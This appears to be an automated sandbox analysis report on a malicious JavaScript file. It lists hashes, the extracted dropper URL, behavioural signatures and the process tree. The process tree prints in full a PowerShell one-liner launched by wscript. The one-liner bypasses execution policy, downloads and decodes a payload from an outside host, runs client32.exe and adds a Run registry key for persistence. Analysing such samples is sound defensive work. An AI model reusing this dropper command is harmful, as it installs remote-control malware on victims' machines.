Analysis
-
max time kernel
120s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20230824-en -
resource tags
arch:x64arch:x86image:win7-20230824-enlocale:en-usos:windows7-x64system -
submitted
29-08-2023 08:21
Static task
static1
Behavioral task
behavioral1
Sample
581158115811.js
Resource
win7-20230824-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
581158115811.js
Resource
win10v2004-20230703-en
windows10-2004-x64
10 signatures
150 seconds
General
-
Target
581158115811.js
-
Size
3KB
-
MD5
0997ddf7b37727cba3201fa07be4cc6d
-
SHA1
ea5adba0e2ba81557947217f401888d51f96a245
-
SHA256
a6e37789dea33b593d76b8dfaa0c7a809ee1ce3850974c65a4345838877c3a2e
-
SHA512
f212e63de50a388dd450371c2a3f5f9992160f6e644fa018447b4a5c9f6a837417559b66663339b3aa5f47af6577e8c8ddd236b31fa6441327abc1bb579f07be
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://instalfrio.cl/destination.txt
exe.dropper
http://instalfrio.cl/destination.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 3068 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3068 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2296 wrote to memory of 3068 2296 wscript.exe 31 PID 2296 wrote to memory of 3068 2296 wscript.exe 31 PID 2296 wrote to memory of 3068 2296 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\581158115811.js1⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068
-